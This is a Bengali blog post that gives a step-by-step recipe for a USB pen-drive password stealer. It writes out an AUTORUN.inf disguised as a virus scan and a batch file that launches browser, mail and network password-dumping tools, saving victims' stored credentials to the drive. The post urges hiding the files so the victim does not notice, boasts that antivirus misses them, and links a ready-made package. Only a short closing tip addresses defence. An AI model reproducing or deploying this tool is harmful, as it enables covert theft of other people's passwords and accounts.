+8801738267201

0
বিষয়টা হয়তো কিছুটা পরিচিত। আমার কিছু বন্ধুর জন্যই বলা যায় টিউনটা করা। ;) আজকাল সবার কাছেই পেনড্রাইভ আছে বলা যায়। একজনের পিসি থেকে আরেক জনের পিসিতে অবাধে বিচরন করছে এই পেনড্রাইভ। আর এই পেনড্রাইভ কে ব্যবহার করতে পারেন হ্যাকিং এর ছোট হাতিয়ার হিসেবে। শুধু পেনড্রাইভই নয় মেমরি কার্ড দিয়েও একই কাজ করা সম্ভব! তাহলে চলুন শুরু করা যাক।



প্রথমে দুইটা ফাইল বানাতে হবে। নাম ধরেন AUTORUN এবং LAUNCH।
একটা নোট প্যাড খুলুন। তারপর টাইপ করুন
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
এখন সেভ করুন AUTORUN.inf নামে।
আবার নোট প্যাড খুলুন। তারপর টাইপ করুন
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
এখন সেভ করুন LAUNCH.bat নামে। আপনি আপনার মতো কাস্টোমাইজও করে নিতে পারেন।
এখন এই সাইটে যান।
এখানে থেকে আপনার প্রয়োজনীয় সফটওয়্যার ডাউনলোড করে নিতে পারেন।

এত ঝামেলা না করতে চাইলে সরাসরি এখান থেকে এই ফাইলটি ডাউনলোড করে নিন। তারপর Extract করে ফোল্ডারের সব ফাইলগুলো আপনার পেনড্রাইভে কপি করুন। বলা যায় আপনার কাজ শেষ।

এখন এই পেনড্রাইভ যে কারও পিসিতে প্রবেশ করালেই পেয়ে যাবেন সব সেভ করা পাসওয়ার্ড!
**শর্ত প্রযোজ্য :P
যার পিসিতে প্রবেশ করাবেন তার AUTORUN অফ করা থাকলে সরাসরি কাজ করবে না। তবে আপনি যদি সুযোগ বুঝে LAUNCH নামক ফাইলটি ডাবল ক্লিক করে ওপেন করে ফেলেন তাহলেই কেল্লা ফতে! আর যদি AUTORUN অফ না করা থাকে তাহলেতো আর কিছুই করা লাগবে না। অটো সব পাসওয়ার্ড হ্যাক হয়ে যাবে। :D
আর মজার কথা হলো AUTORUN ফাইলটা ছাড়া আর কোন ফাইল এন্টিভাইরাস ধরতে পারবে না। তাই নির্ভয়ে হ্যাক চালিয়ে যেতে পারবেন। ;)
কিভাবে হ্যাক করা পাসওয়ার্ডগুলো দেখবেন? খুব সহজ! আপনার পেনড্রাইভ ফোল্ডারে দেখুন
WebBrowserPassView নামসহ কিছু টেক্সট ফাইল তৈরি হয়েছে। সব পাসওয়ার্ড এই টেক্সট ফাইলেই পাবেন। এভাবে আপনি Internet Explorer, Mozilla Firefox (All Versions), Google Chrome, and Opera এর সব সেভ করা পাসওয়ার্ড হাতিয়ে নিতে পারবেন। :mrgreen:
**সতর্কতা স্বরুপ আপনি ফাইলগুলো হিডেন করে রাখতে পারেন। যাতে ভিক্টিম বুঝতে না পারে।** ;) :P
কিভাবে বাচবেন এমন হ্যাকারের হাত থেকে? তেমন কিছু না।
AUTORUN অফ করে রাখুন+ মাস্টার পাসওয়ার্ড ব্যবহার করুন। মজিলার Tools -> Options -> Security / Passwords -> Use a master password কাজ শেষ!
আশা করি আপনাদের  ভাল লেগেছে।

একটি মন্তব্য পোস্ট করুন

Dear readers, after reading the Content please ask for advice and to provide constructive feedback Please Write Relevant Comment with Polite Language.Your comments inspired me to continue blogging. Your opinion much more valuable to me. Thank you.